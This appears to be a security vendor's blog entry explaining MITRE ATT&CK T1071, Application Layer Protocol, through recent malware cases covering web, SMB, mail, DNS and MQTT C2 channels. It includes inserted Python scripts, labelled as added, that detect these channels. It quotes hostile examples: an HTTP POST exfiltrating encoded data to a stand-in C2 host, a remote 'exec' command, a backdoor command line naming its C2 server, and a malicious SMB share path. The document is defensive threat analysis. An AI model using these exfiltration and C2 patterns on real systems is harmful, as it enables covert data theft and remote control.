MITRE ATT&CK T1071 Application Layer Protocol

The Red Report 2025

The 10 Most Prevalent MITRE ATT&CK Techniques Used by Adversaries.

LAST UPDATED ON FEBRUARY 6, 2025

The Open System Interconnection (OSI) model is the conceptual framework used to understand and standardize the functions of networking. The OSI model is divided into seven layers, each responsible for specific tasks related to data communication between devices on a network. The topmost layer in the OSI model is the Application Layer, and the protocols that live in this layer are called Application Layer Protocols. These protocols define the rules that ensure the interoperability and compatibility of diverse software applications across different platforms and networks. Adversaries exploit Application Layer Protocols to stealthily infiltrate systems, exfiltrate data, and maintain persistent access by blending in with legitimate traffic.

In this blog, we explain in detail the T1071 Application Layer Protocol technique of the MITRE ATT&CK® framework and how adversaries employ its sub-techniques in attack campaigns.


Adversary Use of Application Layer Protocol

Application Layer Protocols, when leveraged by cyber adversaries, continue to provide a sophisticated means of conducting operations discreetly, seamlessly blending malicious activities with legitimate network traffic to evade detection. This tactic leverages the ubiquity and inherent trust of widely used protocols, embedding malicious commands and data within routine communication to obscure their intent.

Adversaries increasingly choose protocols based on their prevalence and perceived innocuity in specific environments. Protocols associated with web browsing, file transfers, email communications, and DNS queries remain prime targets due to their omnipresence in modern networks. The traffic generated by these protocols is so routine that malicious activity often hides in plain sight.

Within corporate or high-security network segments, attackers exploit protocols commonly used for internal communications, such as HTTP/S, WebSocket, SMB, FTP, FTPS, DNS, SMTP, IMAP, POP3, MQTT, XMPP, and AMQP [1]. These protocols are essential for remote access, file sharing, and inter-application communication. Manipulating these trusted channels allows adversaries to achieve their objectives, including issuing commands to compromised systems, exfiltrating data, and moving laterally across networks, all while maintaining a low profile.

Sub-techniques of T1071 Application Layer Protocol

There are 5 sub-techniques under the Application Layer Protocol technique in ATT&CK v16:

ID          Name
T1071.001   Web Protocols
T1071.002   File Transfer Protocols
T1071.003   Mail Protocols
T1071.004   DNS
T1071.005   Publish/Subscribe Protocols

Each of these sub-techniques will be explained in the next sections.

T1071.001 Web Protocols

Adversaries exploit HTTP, HTTPS, and WebSocket protocols for Command-and-Control (C2) operations due to their widespread use and ability to blend seamlessly with legitimate web traffic. HTTP/S allows compromised systems to fetch instructions or exfiltrate data, with HTTPS encryption further obscuring malicious content from security tools. WebSocket enhances this by providing a persistent, full-duplex communication channel for real-time data transfer and command execution, reducing the overhead of repeated requests. Together, these protocols enable adversaries to evade detection, leveraging trusted web traffic to conceal their operations and bypass traditional security controls.

For instance, reported in November 2024, the WezRat malware establishes its Command and Control (C2) communication using HTTPS as part of its infection chain. After the phishing email tricks the victim into visiting the malicious lookalike site (il-cert[.]net), they are prompted to download a fake Google Chrome Installer.msi. This MSI file not only delivers a legitimate Chrome installer but also drops and executes a malicious backdoor, Updater.exe, with C2 server arguments [2].

"C:\Program Files (x86)\Google\Update\Updater.exe" connect.il-cert.net 8765

The backdoor uses the HTTPS protocol to communicate securely with the C2 server located at connect.il-cert[.]net. This communication involves sending system information, receiving encrypted commands, and exfiltrating stolen data. By leveraging HTTPS, WezRat ensures that its traffic remains encrypted, allowing it to evade detection by security tools that rely on inspecting plain network traffic. The encryption masks malicious activity as legitimate web traffic, further complicating identification and blocking.

In the case of Glutton malware, discovered in December 2024, HTTP is central to its modular attack framework [3]. The malware periodically polls a C2 server using standard HTTP GET or POST requests to fetch updated commands or additional payloads. Once downloaded, these payloads are executed to enable file operations, collect system information, or inject code into frameworks like Laravel and ThinkPHP.

Notably, Glutton does not encrypt its C2 traffic, relying on clear-text HTTP to deliver task instructions and new modules. The malware mimics legitimate web traffic by embedding commands within HTTP headers or responses and using periodic polling to avoid detection.

For example, in the following HTTP POST request, the malware exfiltrates collected data, such as stolen files or credentials, to the C2 server:

POST /data/upload HTTP/1.1
Host: c2.example.com
Content-Type: application/json
Content-Length: 57

{"system":"hostname","data":"base64-encoded information"}

In response, the C2 server can deliver commands to the malware, such as:

{"command":"exec","payload":"ls -al"}

This demonstrates HTTP's technical versatility for enabling discreet, modular, and persistent C2 operations. 

In another case, between August and October 2024, the RevC2 backdoor was identified, utilizing WebSockets—a protocol that operates over HTTP/S—for C2 communication [4]. At a technical level, RevC2 adopts WebSocket for its communication channel, which is an extension of HTTP but allows for full-duplex, real-time communication between the malware (acting as a client) and the C2 server. The initial WebSocket connection begins with an HTTP-based handshake: the malware sends an HTTP request to the C2 server containing an Upgrade header, signaling the intention to establish a WebSocket connection. Once the server responds with a 101 Switching Protocols status, the connection upgrades from HTTP to WebSocket, enabling continuous two-way communication without the overhead of repeatedly establishing new HTTP connections.

WebSocket's nature gives RevC2 a significant advantage for stealth and efficiency. Unlike conventional HTTP, where each command requires a separate request and response, WebSocket maintains a persistent connection, allowing the malware to send and receive data seamlessly over a single channel. This avoids frequent connection attempts that might raise suspicions. Additionally, WebSocket traffic is indistinguishable from legitimate web traffic in many environments because it uses the same ports as HTTP (port 80) or HTTPS (port 443) and often leverages encrypted WebSocket Secure (WSS) communication. This makes deep-packet inspection tools less effective at detecting malicious activity.
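Because Glutton's clear-text polling and RevC2's WebSocket channel both ride on ordinary web ports, a practical detection looks at timing rather than content. The following Python is added here as an illustration, not code from the report or from the cited analyses: it groups constructed proxy-log lines by client and host and flags pairs whose request spacing is too regular to be a person browsing. The hostnames, addresses and thresholds are assumed.

```python
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed proxy log (not from the report): time src method host path status.
# 10.0.0.5 polls one host every minute with almost no jitter; 10.0.0.7 is a person browsing.
SAMPLE_LOG = """\
2025-02-06T10:00:00 10.0.0.5 GET c2.example.com /tasks 200
2025-02-06T10:00:03 10.0.0.7 GET www.example.org / 200
2025-02-06T10:01:00 10.0.0.5 GET c2.example.com /tasks 200
2025-02-06T10:01:41 10.0.0.7 GET www.example.org /news 200
2025-02-06T10:02:01 10.0.0.5 GET c2.example.com /tasks 200
2025-02-06T10:03:00 10.0.0.5 POST c2.example.com /data/upload 200
2025-02-06T10:03:55 10.0.0.7 GET cdn.example.org /a.js 200
2025-02-06T10:04:00 10.0.0.5 GET c2.example.com /tasks 200
2025-02-06T10:05:00 10.0.0.5 GET c2.example.com /tasks 200
2025-02-06T10:09:12 10.0.0.7 GET www.example.org /about 200
"""

def request_times(log):
    """Group request timestamps by (client, host); method and path do not matter for timing."""
    flows = defaultdict(list)
    for line in log.splitlines():
        ts, src, _method, host, _path, _status = line.split()
        flows[(src, host)].append(datetime.fromisoformat(ts))
    return flows

def find_beacons(log, min_requests=5, max_cv=0.1):
    """Return (src, host, mean_interval_s, cv) for pairs whose request spacing is suspiciously regular.

    cv is the coefficient of variation of the inter-request gaps (stdev / mean): a script polling
    on a fixed timer drives it toward zero, while human browsing produces widely varying gaps.
    """
    hits = []
    for (src, host), times in request_times(log).items():
        if len(times) < min_requests:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.fmean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean else 0.0
        if cv <= max_cv:
            hits.append((src, host, round(mean, 1), round(cv, 3)))
    return hits
```

Real implants add jitter, so tune max_cv and min_requests against a baseline of your own proxy logs; TLS and WSS hide the body but not this timing.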

T1071.002 File Transfer Protocols

Adversaries exploit file transfer protocols like SMB, FTP, FTPS, and TFTP for malicious activities by blending their communications with regular network traffic, making detection difficult. These protocols inherently contain numerous fields and headers, which can be manipulated to conceal malicious commands and data. This method is particularly effective for command and control operations, allowing attackers to discreetly maintain communication with compromised systems. They can also use these protocols to transfer malware or exfiltrate data, all while appearing as regular file transfer traffic. 

For example, in the March-April 2024 DarkGate malware campaign, adversaries exploited the SMB protocol to discreetly transfer malicious payloads and scripts [5]. 

Malicious Microsoft Excel files embedded objects that, when triggered, fetched VBScript (.vbs) or JavaScript (.js) files directly from public-facing SMB shares, such as:

\\167[.]99[.]115[.]33\share\EXCEL_OPEN_DOCUMENT[.]vbs

These scripts executed commands to download and run follow-up PowerShell scripts, which retrieved additional malware components like obfuscated shellcode (test.txt) and AutoHotKey-based executables from SMB or HTTP locations. By leveraging SMB, a protocol trusted for legitimate file-sharing operations, DarkGate blended malicious file transfers with normal network traffic, reducing detection risk. 

The staged, modular approach facilitated stealthy deployment and execution of its payloads, while the reliance on publicly accessible SMB shares minimized direct communication with traditional C2 servers, ensuring persistence and evasion of network monitoring tools.

On the other hand, reported in the April 2024 LemonDuck malware campaign, adversaries leveraged the SMB protocol to covertly transfer malicious files and maintain persistence [6]. Using the EternalBlue vulnerability (CVE-2017-0144), the attacker gained initial access and created a hidden administrative share on the C: drive, enabling remote file transfers without detection. 

Malicious executables, such as msInstall.exe and its renamed versions (FdQn.exe, HbxbVCnn.exe), were transferred and executed through SMB, blending with normal file-sharing activities. The attacker utilized SMB to deploy scripts and batch files (p.bat) to facilitate scheduled tasks, modify network configurations, and download additional payloads, ensuring continuous malware execution. 

By exploiting SMB for file transfer and execution, LemonDuck discreetly moved payloads across systems while avoiding detection, demonstrating the protocol's effectiveness for covert communication and malware delivery in adversarial operations.

T1071.003 Mail Protocols

Adversaries increasingly target email protocols such as SMTP, IMAP, and POP3 for C2 communications. These protocols, integral to the sending and receiving of emails, are exploited to relay commands to compromised systems and exfiltrate sensitive data discreetly. The attackers often use email attachments or hijack legitimate email accounts, including self-registered or compromised ones, to conduct their operations. This tactic allows them to blend in with regular email traffic, avoiding detection. 

For instance, the Snake malware analyzed in 2024, also known as Snake Keylogger, utilizes this technique by exploiting the SMTP protocol to exfiltrate stolen data and establish command-and-control (C2) communications [7]. The malware targets email clients like Microsoft Outlook, extracting credentials for protocols such as IMAP, POP3, and SMTP from the Windows Registry. Using pre-configured SMTP server details, including hardcoded hostnames, ports, and credentials, Snake sends stolen information, such as keystrokes, screenshots, and clipboard data, in plaintext or encrypted formats. This exfiltration can occur via two approaches: embedding the data directly in the email body or attaching it as files. By leveraging widely used mail protocols, Snake blends its malicious activity with legitimate email traffic, making it harder to detect and analyze within compromised systems.

Another example comes from a Trojan identified by security researchers in February 2024, named Trojan.Win32.Injuke.mlrx [8]. This malware leverages the T1071.003 Mail Protocols technique for command and control. Designed for electronic espionage, the Trojan is capable of intercepting keyboard inputs, capturing screenshots, and retrieving active application lists. The stolen information is exfiltrated to cybercriminals through multiple channels, including email, demonstrating its use of mail protocols to evade detection.

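The DarkGate case (payloads pulled from a public-facing SMB share) and the Snake case (mail sent straight from an endpoint using hard-coded SMTP settings) share one network signature: a workstation talking to a public address on a port that only internal file servers or the mail gateway should use. The following Python is added here and is not drawn from the report or the cited analyses; it applies that rule to constructed flow records, and apart from the share address quoted in the DarkGate section, the addresses, the mail-relay list and the RFC 1918 assumption are all assumed.

```python
import ipaddress

# Constructed flow records (not from the report): (src, dst, dport, bytes_out).
# The first dst is the share address quoted in the DarkGate section; the rest are made up.
SAMPLE_FLOWS = [
    ("10.0.0.5", "167.99.115.33", 445, 12288),   # workstation pulling a script from a public SMB share
    ("10.0.0.5", "10.0.0.20", 445, 4096),        # ordinary internal file-share traffic
    ("10.0.0.9", "203.0.113.25", 587, 70000),    # endpoint speaking SMTP submission to the internet
    ("10.0.0.2", "203.0.113.25", 25, 900000),    # the mail gateway relaying outbound mail
    ("10.0.0.9", "198.51.100.7", 443, 3000),     # ordinary HTTPS
]
MAIL_RELAYS = {"10.0.0.2"}                       # assumed: hosts allowed to send mail outbound
SMB_PORTS = {139, 445}
MAIL_PORTS = {25, 465, 587}
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def is_internal(addr):
    """True for RFC 1918 space; everything else is treated as the public internet (assumption)."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)

def check_flow(src, dst, dport, mail_relays=MAIL_RELAYS):
    """Return a verdict string for a single flow, or None if it looks normal."""
    if is_internal(dst):
        return None                               # internal file shares and relays are fine
    if dport in SMB_PORTS:
        return "smb-to-public-share"              # T1071.002: DarkGate-style script retrieval
    if dport in MAIL_PORTS and src not in mail_relays:
        return "direct-smtp-from-endpoint"        # T1071.003: Snake-style exfiltration by mail
    return None

def find_egress_abuse(flows, mail_relays=MAIL_RELAYS):
    """List (verdict, src, dst, dport, bytes_out) for every flow that trips a rule."""
    findings = []
    for src, dst, dport, bytes_out in flows:
        verdict = check_flow(src, dst, dport, mail_relays)
        if verdict:
            findings.append((verdict, src, dst, dport, bytes_out))
    return findings
```

In practice the same rule is enforced at the perimeter by blocking outbound 445 and 25/465/587 from everything except the designated relays; this script is the audit that shows which hosts are already violating it.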

T1071.004 DNS

Attackers leverage DNS for more than tunneling, employing techniques such as DNS-over-HTTPS (DoH) for encrypted exchanges, DNS dribbling for slow and stealthy communication, and encoding data in DNS traffic to blend malicious activity with normal network behavior. These methods enable adversaries to evade traditional security measures while maintaining reliable and covert communication channels.

For instance, reported in April 2024, the MadMxShell backdoor exploits the DNS protocol for covert C2 communication by embedding encoded data within DNS MX queries and responses [9]. The backdoor converts binary data into alphanumeric subdomain strings using a custom 36-character lookup table. To stay within DNS size constraints, each DNS packet is limited to 103 bytes, with larger messages split across sequential packets. The backdoor transmits at rapid three-second intervals, generating noisier traffic than HTTP-based malware. Requests and responses are structured messages encoded in subdomains, with subdomain blocks separated by periods. This approach lets the malware mimic legitimate DNS activity, blending in with normal traffic while evading detection.

In another case identified in December 2024, researchers discovered that GammaLoad malware leverages sophisticated DNS-based techniques to obfuscate and maintain its C2 communication [10]. The malware employs DNS-over-HTTPS to resolve C2 infrastructure, ensuring encrypted and stealthy communication when traditional DNS resolution methods are blocked or fail. Additionally, it implements a DNS fast-fluxing technique, dynamically rotating DNS records for its C2 servers to evade tracking and disruption.

These methods enable the malware to maintain consistent and covert communication with its C2 infrastructure, bypassing conventional network security measures designed to detect and block malicious traffic.
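The MadMxShell pattern described above (long alphanumeric first labels, many never-repeated MX queries to one domain, a fixed short interval) is visible in resolver logs without decoding the custom alphabet. This Python example is added here and is not taken from the report or the cited analyses; the log lines, domain names and thresholds are constructed and assumed.

```python
import math
import statistics
from collections import defaultdict

# Constructed resolver log (not from the report): time src qtype qname.
# 10.0.0.5 sends MX queries every 3 s whose first label is 20 alphanumeric characters.
SAMPLE_DNS_LOG = """\
10:00:00 10.0.0.5 MX 7q1wz9ab3kd0e5rfy2x8.0n4lv6u1.dnsc2.example
10:00:03 10.0.0.5 MX 3hdk91xpz0w7t2sq5uyb.1n4lv6u1.dnsc2.example
10:00:06 10.0.0.5 MX cq8l2me7vr0t49knw1ze.2n4lv6u1.dnsc2.example
10:00:09 10.0.0.5 MX m0p5xt1y8h3zk6dq2nvw.3n4lv6u1.dnsc2.example
10:00:12 10.0.0.5 MX zr7e4k0aj2mbq9sv1lhn.4n4lv6u1.dnsc2.example
10:00:05 10.0.0.7 A www.example.org
10:00:20 10.0.0.7 MX example.org
10:00:41 10.0.0.7 A cdn.example.org
"""

def entropy(label):
    """Shannon entropy in bits per character of a DNS label."""
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in (label.count(ch) for ch in set(label)))

def registered_domain(qname):
    # Two trailing labels are enough for this sample; real deployments need a public-suffix list.
    return ".".join(qname.split(".")[-2:])

def find_dns_channels(log, min_queries=5, min_label_len=16, min_entropy=3.5):
    """Return (src, domain, query_count, mean_gap_s) for likely DNS-encoded channels."""
    groups = defaultdict(list)
    for line in log.splitlines():
        ts, src, qtype, qname = line.split()
        if qtype == "MX":                           # MadMxShell-style channels ride on MX lookups
            h, m, s = (int(x) for x in ts.split(":"))
            groups[(src, registered_domain(qname))].append((h * 3600 + m * 60 + s, qname))
    hits = []
    for (src, dom), items in groups.items():
        if len(items) < min_queries:
            continue
        items.sort()
        names = [q for _, q in items]
        labels = [q.split(".")[0] for q in names]
        gaps = [b[0] - a[0] for a, b in zip(items, items[1:])]
        if (len(set(names)) == len(names)                      # never repeated: nothing for caches to absorb
                and min(map(len, labels)) >= min_label_len       # long, data-carrying first label
                and statistics.fmean(map(entropy, labels)) >= min_entropy):
            hits.append((src, dom, len(names), round(statistics.fmean(gaps), 1)))
    return hits
```

The mean gap is reported rather than thresholded because the interval varies by family; the 3.0 s seen here matches the cadence described for MadMxShell, whereas DNS "dribbling" implants deliberately stretch it out.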

T1071.005 Publish/Subscribe Protocols

Adversaries exploit publish/subscribe protocols like MQTT, XMPP, and AMQP to establish covert communication channels with compromised systems. By embedding malicious commands or data into legitimate-looking protocol traffic, they leverage the centralized broker to route messages to their targets while evading detection. These protocols allow attackers to blend their activities with normal traffic, complicating efforts to distinguish malicious behavior. The asynchronous and scalable nature of these protocols further aids adversaries in maintaining persistent C2 operations across multiple systems, often bypassing traditional network monitoring and security controls.

For instance, reported in December 2024, IOCONTROL is a sophisticated malware targeting critical infrastructure, including IoT and OT devices like IP cameras, routers, PLCs, and HMIs [11]. It utilizes the MQTT protocol over port 8883 for encrypted C2 communications, embedding unique device IDs into MQTT credentials for precise control. Additionally, it employs DNS over HTTPS to resolve C2 domains, evading network traffic monitoring tools.

On the other hand, WailingCrab is a multi-component malware distributed via phishing emails with malicious attachments. Since mid-2023, its backdoor component has communicated with its C2 server using the MQTT protocol [12]. By leveraging a legitimate third-party broker, broker.emqx[.]io, WailingCrab conceals the true address of its C2 server, enhancing its stealth. This approach allows the malware's C2 communications to blend with legitimate IoT traffic, complicating detection efforts. These cases illustrate how threat actors exploit publish/subscribe protocols to establish covert and resilient C2 channels, often integrating seamlessly with legitimate network traffic to evade detection. 

References

[1] “Application Layer Protocol.” Available: https://attack.mitre.org/techniques/T1071/. [Accessed: Feb. 06, 2025]

[2] “Malware Spotlight: A Deep-Dive Analysis of WezRat,” Check Point Research, Nov. 14, 2024. Available: https://research.checkpoint.com/2024/wezrat-malware-deep-dive/. [Accessed: Dec. 17, 2024]

[3] The Hacker News, “New Glutton Malware Exploits Popular PHP Frameworks Like Laravel and ThinkPHP,” The Hacker News, Dec. 16, 2024. Available: https://thehackernews.com/2024/12/new-glutton-malware-exploits-popular.html. [Accessed: Dec. 17, 2024]

[4] I. V. A. Muhammed, “Unveiling RevC2 and Venom Loader,” Dec. 02, 2024. Available: https://www.zscaler.com/blogs/security-research/unveiling-revc2-and-venom-loader. [Accessed: Dec. 17, 2024]

[5] V. Thothathri, Y. Sui, A. Maurya, U. P. Singh, and B. Duncan, “DarkGate: Dancing the Samba With Alluring Excel Files,” Unit 42, Jul. 10, 2024. Available: https://unit42.paloaltonetworks.com/darkgate-malware-uses-excel-files/. [Accessed: Dec. 17, 2024]

[6] “LemonDuck Unleashes Cryptomining Attacks Through SMB Service Exploits,” Oct. 04, 2024. Available: https://notes.netbytesec.com/2024/10/lemonduck-unleashes-cryptomining.html. [Accessed: Dec. 17, 2024]

[7] M. Ezat, “Deep Analysis of Snake,” ZW01f, Jun. 30, 2024. Available: https://zw01f.github.io/malware%20analysis/snake/. [Accessed: Dec. 17, 2024]

[8] “Trojan.Win32.Injuke.mlrx.” Available: https://threats.kaspersky.com/en/threat/Trojan.Win32.Injuke.mlrx/. [Accessed: Dec. 17, 2024]

[9] R. Tay and S. Singh, “Malvertising campaign targeting IT teams with MadMxShell,” Apr. 17, 2024. Available: https://www.zscaler.com/blogs/security-research/malvertising-campaign-targeting-it-teams-madmxshell. [Accessed: Dec. 18, 2024]

[10] The Hacker News, “Hackers Leveraging Cloudflare Tunnels, DNS Fast-Flux to Hide GammaDrop Malware,” The Hacker News, Dec. 06, 2024. Available: https://thehackernews.com/2024/12/hackers-leveraging-cloudflare-tunnels.html. [Accessed: Dec. 18, 2024]

[11] B. Toulas, “New IOCONTROL malware used in critical infrastructure attacks,” BleepingComputer, Dec. 12, 2024. Available: https://www.bleepingcomputer.com/news/security/new-iocontrol-malware-used-in-critical-infrastructure-attacks/. [Accessed: Dec. 18, 2024]

[12] C. Hammond, O. Villadsen, and K. Metrick, “Stealthy WailingCrab Malware misuses MQTT Messaging Protocol,” Security Intelligence, Nov. 21, 2023. Available: https://securityintelligence.com/x-force/wailingcrab-malware-misues-mqtt-messaging-protocol/. [Accessed: Dec. 18, 2024]